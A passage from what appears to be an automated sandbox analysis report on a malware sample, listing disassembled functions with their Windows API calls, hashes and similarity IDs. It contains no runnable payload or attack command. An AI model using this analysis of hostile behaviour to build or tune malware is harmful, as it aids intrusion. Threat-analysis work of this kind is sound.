                                                                                                    • Instruction Fuzzy Hash: BCF02E762253553DD120D1245D40EFF62ADCBC27A1F08473DF9549A180D7A18D8883F5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 033039A8 Relevance: 9.1, APIs: 6, Instructions: 89windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • IsIconic.USER32(?), ref: 033039B0
                                                                                                    • SetActiveWindow.USER32(?,?,?,?,033033AA,00000000,0330387E), ref: 033039C1
                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 033039E4
                                                                                                    • DefWindowProcA.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,033033AA,00000000,0330387E), ref: 033039FD
                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,?,?,033033AA,00000000,0330387E), ref: 03303A43
                                                                                                    • SetFocus.USER32(00000000,?,00000000,00000000,?,?,033033AA,00000000,0330387E), ref: 03303A91
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ActiveEnabledFocusIconicProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 848842217-0
                                                                                                    • Opcode ID: 06ca2b1c5734c5e5057a57286698f434e265f60cdc8cf30af14d2d484b51b90d
                                                                                                    • Instruction ID: eb527408851d9f85237825f14a7c53d688d767c28eaa56d8c51e38fc16e8efab
                                                                                                    • Opcode Fuzzy Hash: 06ca2b1c5734c5e5057a57286698f434e265f60cdc8cf30af14d2d484b51b90d
                                                                                                    • Instruction Fuzzy Hash: B8312E79B103409BEB24EA68CDD4FAA77ACAF04750F0C14A5FE04EF2D6D6B4E8848754
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032F1938 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • IsIconic.USER32(?), ref: 032F1977
                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 032F1995
                                                                                                    • GetWindowPlacement.USER32(?,0000002C), ref: 032F19CB
                                                                                                    • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 032F19EF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Placement$Iconic
                                                                                                    • String ID: ,
                                                                                                    • API String ID: 568898626-3772416878
                                                                                                    • Opcode ID: 270ef7ac14398b7a7cda34cb21d5cbccd4aa780e520a53b2575b1ccb6a4c7180
                                                                                                    • Instruction ID: 6a3e1b6e48c3ede2ca78181a7b1b44843be098fd475bbcddf41d20d4c1d92c7d
                                                                                                    • Opcode Fuzzy Hash: 270ef7ac14398b7a7cda34cb21d5cbccd4aa780e520a53b2575b1ccb6a4c7180
                                                                                                    • Instruction Fuzzy Hash: FD21F975A10204AFCF14EF69C8809DAB7A8AF49350F448565FE19DF206D7B1E8848BA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 033038E4 Relevance: 7.6, APIs: 5, Instructions: 62windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • IsIconic.USER32(?), ref: 033038EB
                                                                                                    • SetActiveWindow.USER32(?,?,?,0330339D,00000000,0330387E), ref: 03303903
                                                                                                      • Part of subcall function 03302F70: EnumWindows.USER32(Function_00052F00,00000000), ref: 03302F9A
                                                                                                      • Part of subcall function 03302F70: ShowOwnedPopups.USER32(00000000,?), ref: 03302FC9
                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 0330392F
                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,00000000,00000040,00000000,?,?,?,0330339D,00000000,0330387E), ref: 03303962
                                                                                                    • DefWindowProcA.USER32(?,00000112,0000F020,00000000,?,00000000,00000000,00000000,?,00000000,00000040,00000000,?,?,?,0330339D), ref: 03303977
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ActiveEnabledEnumIconicOwnedPopupsProcShowWindows
                                                                                                    • String ID:
                                                                                                    • API String ID: 2995439034-0
                                                                                                    • Opcode ID: 86d927cc1de3d8bb568bb73cda66fc6eb496eca0e1d19aebb0843c73381325ce
                                                                                                    • Instruction ID: 6b7a9269ff9507a136d4addcde37a5e1645469a7a2d1aa577fba3a903671ecfd
                                                                                                    • Opcode Fuzzy Hash: 86d927cc1de3d8bb568bb73cda66fc6eb496eca0e1d19aebb0843c73381325ce
                                                                                                    • Instruction Fuzzy Hash: 8C11EC78A143009BDB64EF6DCDD5F5A77A9AF48300F4800A4BA44DF2EBD6B5D8848710
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032DAEB8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc
                                                                                                    • String ID: MonitorFromWindow
                                                                                                    • API String ID: 190572456-2842599566
                                                                                                    • Opcode ID: b466ba013e58d7e7673febb9a2bf04fffd72dadd165d848c64560a1e57b1e442
                                                                                                    • Instruction ID: 1f531d2152086c27c41ccf3286020a83d8b5e4741b8ed6b85875a28d76f5430c
                                                                                                    • Opcode Fuzzy Hash: b466ba013e58d7e7673febb9a2bf04fffd72dadd165d848c64560a1e57b1e442
                                                                                                    • Instruction Fuzzy Hash: 590169A69282196F9704EA589C80EFFB36CEF05350F448492E8159F241EB669AC187F5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032CA27C Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FindResourceA.KERNEL32(?,?,?), ref: 032CA293
                                                                                                    • LoadResource.KERNEL32(?,032CA318,?,?,?,032C5D70,?,00000001,00000000,?,032CA1BE,00000000,?), ref: 032CA2AD
                                                                                                    • SizeofResource.KERNEL32(?,032CA318,?,032CA318,?,?,?,032C5D70,?,00000001,00000000,?,032CA1BE,00000000,?), ref: 032CA2C7
                                                                                                    • LockResource.KERNEL32(032C9E88,00000000,?,032CA318,?,032CA318,?,?,?,032C5D70,?,00000001,00000000,?,032CA1BE,00000000), ref: 032CA2D1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                    • String ID:
                                                                                                    • API String ID: 3473537107-0
                                                                                                    • Opcode ID: 28e7e119e039b25beda35739a3405b35bb29ee27f4b5ad7a1bbed113ed856bf2
                                                                                                    • Instruction ID: be3d3c06a48dcfaedcb8e51e503eb8c20518ce5c5df8618937508ff7343b9082
                                                                                                    • Opcode Fuzzy Hash: 28e7e119e039b25beda35739a3405b35bb29ee27f4b5ad7a1bbed113ed856bf2
                                                                                                    • Instruction Fuzzy Hash: D2F081776243186F9B49EFACA880D9B73FCEE892A0314415AF90CCB205DAB1DD518374
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0330B614 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 032B5228: SysAllocStringLen.OLEAUT32(?,?), ref: 032B5236
                                                                                                    • RtlInitUnicodeString.N(?,?,00000000,0330B68E), ref: 0330B63C
                                                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0330B68E), ref: 0330B652
                                                                                                    • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0330B68E), ref: 0330B671
                                                                                                      • Part of subcall function 032B4F68: SysFreeString.OLEAUT32(0330C964), ref: 032B4F76
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
                                                                                                    • String ID:
                                                                                                    • API String ID: 1694942484-0
                                                                                                    • Opcode ID: e01e8e04a1ae4483de27e8bd9fc2ab1798da633e52087e19ba1f821be15667ca
                                                                                                    • Instruction ID: 46fc0172908afeac09ea637d0541c84822b4aa892cdeacc4378f5510ee73c55b
                                                                                                    • Opcode Fuzzy Hash: e01e8e04a1ae4483de27e8bd9fc2ab1798da633e52087e19ba1f821be15667ca
                                                                                                    • Instruction Fuzzy Hash: 5B01EC7995430CAEDB11EBE0CD92FDDB3BCEB48700F6145A1E610EA5C0EA75EB048A64
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 03302474 Relevance: 4.5, APIs: 3, Instructions: 33synchronizationthreadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 03302480
                                                                                                    • GetCursorPos.USER32(?), ref: 0330249D
                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00000064), ref: 033024BD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentCursorObjectSingleThreadWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 1359611202-0
                                                                                                    • Opcode ID: d6d991904ec1302a3a317107c021cd63ee1da723189c530803014263fc98ad4e
                                                                                                    • Instruction ID: 74b76778564fc953c57cde4bde745ba8853c4b29e88ca81d3a3cd89d82a7112d
                                                                                                    • Opcode Fuzzy Hash: d6d991904ec1302a3a317107c021cd63ee1da723189c530803014263fc98ad4e
                                                                                                    • Instruction Fuzzy Hash: CEF082365143089BDB15EB68DCC9B9AB3ECEB04310F844566E511CB1D1EBB994C4CB55
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032EF158 Relevance: 3.1, APIs: 2, Instructions: 97windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetMessagePos.USER32 ref: 032EF167
                                                                                                    • GetKeyboardState.USER32(?,?,?,?,032EF6DC), ref: 032EF264
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: KeyboardMessageState
                                                                                                    • String ID:
                                                                                                    • API String ID: 3083355189-0
                                                                                                    • Opcode ID: e422702caf63331ba9801abbfeadb1726b5f989aa6d7427f36ea3727b841d44c
                                                                                                    • Instruction ID: 964aee0b40e6a2bd8d576fe86b7db01bb8ba00eb86ee579b9413cc34252c045e
                                                                                                    • Opcode Fuzzy Hash: e422702caf63331ba9801abbfeadb1726b5f989aa6d7427f36ea3727b841d44c
                                                                                                    • Instruction Fuzzy Hash: 8A31A139528345ABC724DF7CC6467DABBD5AF89310F814A2AE598C7240E7B4C9808797
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032F1030 Relevance: 3.1, APIs: 2, Instructions: 64windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CaptureIconic
                                                                                                    • String ID:
                                                                                                    • API String ID: 2277910766-0
                                                                                                    • Opcode ID: ccff090c3a6bc913213355451a673064edae4c15c66439a31df86c8429d188b2
                                                                                                    • Instruction ID: 8da1c94e201b81350ac6aae58cae4d7e65fcb439ab12125c9b42a2b578af5172
                                                                                                    • Opcode Fuzzy Hash: ccff090c3a6bc913213355451a673064edae4c15c66439a31df86c8429d188b2
                                                                                                    • Instruction Fuzzy Hash: 28113031B20646DFDB24DB59D9C49AAF3F8AF44304B6840B8EA05CB391DB72FD949750
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032D3470 Relevance: 3.0, APIs: 2, Instructions: 46windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(00000000,032D350C), ref: 032D3490
                                                                                                    • FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,032D350C), ref: 032D34B6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                    • String ID:
                                                                                                    • API String ID: 3479602957-0
                                                                                                    • Opcode ID: 958f3aaf5dfab6c35ce7059d8ed97841093a8e29481b0db5b36a976decc7ab63
                                                                                                    • Instruction ID: c0a1925e12c7bec6a3a272faaa3ea048e4b8ddeab9755ee7518a27301fc2cc44
                                                                                                    • Opcode Fuzzy Hash: 958f3aaf5dfab6c35ce7059d8ed97841093a8e29481b0db5b36a976decc7ab63
                                                                                                    • Instruction Fuzzy Hash: 950184782247055FE722EA61CC91BDA73F8AB18740F5540B0EB44EA581DAF5A9C08911
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032B8F58 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 032B8F79
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DiskFreeSpace
                                                                                                    • String ID:
                                                                                                    • API String ID: 1705453755-0
                                                                                                    • Opcode ID: 191ca3f66228928a77bd306299e92db161272771861cde97e417a21d7851d906
                                                                                                    • Instruction ID: 03ece18e986b3718e410acc8140736d896bf85ef758d3fd9cfede3ad0369a0d4
                                                                                                    • Opcode Fuzzy Hash: 191ca3f66228928a77bd306299e92db161272771861cde97e417a21d7851d906
                                                                                                    • Instruction Fuzzy Hash: 2A110CB5E00209AFDB04CF99C8809EFB7F9EFC8310B54C569A408EB250E6719A41CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032BB8C4 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 032BB8E2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale
                                                                                                    • String ID:
                                                                                                    • API String ID: 2299586839-0
                                                                                                    • Opcode ID: 2c53b1a2239317bfc178ecae58eec27d8364ed45474992c4285a8de5d7b9ac4e
                                                                                                    • Instruction ID: fb55fef48de33a9a4320ef50af52cf48cc7b674d6b253081db17ab38cde08575
                                                                                                    • Opcode Fuzzy Hash: 2c53b1a2239317bfc178ecae58eec27d8364ed45474992c4285a8de5d7b9ac4e
                                                                                                    • Instruction Fuzzy Hash: EEE0D87572031817D711E5699CC4EF6727C9758390F00026AB948CB385EEF0DDC047E4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032BB910 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,032BD07E,00000000,032BD297,?,?,00000000,00000000), ref: 032BB923
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale
                                                                                                    • String ID:
                                                                                                    • API String ID: 2299586839-0
                                                                                                    • Opcode ID: b1d6ec197b977121f08516ee7595b6c71277cc4a711715de584c8d8cf224beea
                                                                                                    • Instruction ID: 6e8ea2a96e988f3eb9f9a2bcd3a78a9cbf89c9b11d3046c3314138d5dd64d609
                                                                                                    • Opcode Fuzzy Hash: b1d6ec197b977121f08516ee7595b6c71277cc4a711715de584c8d8cf224beea
                                                                                                    • Instruction Fuzzy Hash: 54D05E6632E6602AE210D15A2D84DBB5EFCCAC57E1F04803AB5C8CB201D2408C469A71
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032BA30C Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LocalTime
                                                                                                    • String ID:
                                                                                                    • API String ID: 481472006-0
                                                                                                    • Opcode ID: 40780567ea648be6f000db617f10910e690f96be7393bdb0f4d36b03cf102dc8
                                                                                                    • Instruction ID: 9f3af1c34245ff6774e36167bc319abc4a07605649a93d34884f9d2a8db5486a
                                                                                                    • Opcode Fuzzy Hash: 40780567ea648be6f000db617f10910e690f96be7393bdb0f4d36b03cf102dc8
                                                                                                    • Instruction Fuzzy Hash: 16A0120440482001C54073184C0217434E05800720FC4074068F8542D0E91D01608093
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 026A48A5 Relevance: .3, Instructions: 293COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000003.2144868732.0000000002670000.00000004.00001000.00020000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_3_2670000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 761e8e647f0b018d5f1533b0d1d12f478d97fb487833b795481caaed8f7852ce
                                                                                                    • Instruction ID: 89c8c403be08aa7bbb6c0c213c9afd0136f7a3f46bfd197c1ab2bf07cc34b50b
                                                                                                    • Opcode Fuzzy Hash: 761e8e647f0b018d5f1533b0d1d12f478d97fb487833b795481caaed8f7852ce
                                                                                                    • Instruction Fuzzy Hash: D1A1857644E7C29FD313DB389895796BFA0FE43224B184ADEC8C14F593C751985ACB82
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032BDD17 Relevance: .1, Instructions: 145COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: bbf546447c09ed1e4715b53e42467d0f5adf3a50d4ed8dbf32eb914c8c674a1b
                                                                                                    • Instruction ID: 5728a914eb6a84b98c463ce2c624eadcfe93d163c615b38551a1ffe3c21831ef
                                                                                                    • Opcode Fuzzy Hash: bbf546447c09ed1e4715b53e42467d0f5adf3a50d4ed8dbf32eb914c8c674a1b
                                                                                                    • Instruction Fuzzy Hash: F251D37140E3E09FCB4397788CA42967FB0AE1B35471E24D7C8C0CF1A7D615696AEB22
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032B2160 Relevance: .1, Instructions: 94COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                    • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                                    • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                    • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032DB75C Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 266libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(uxtheme.dll,00000000,032DBB0F), ref: 032DB792
                                                                                                    • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 032DB7AA
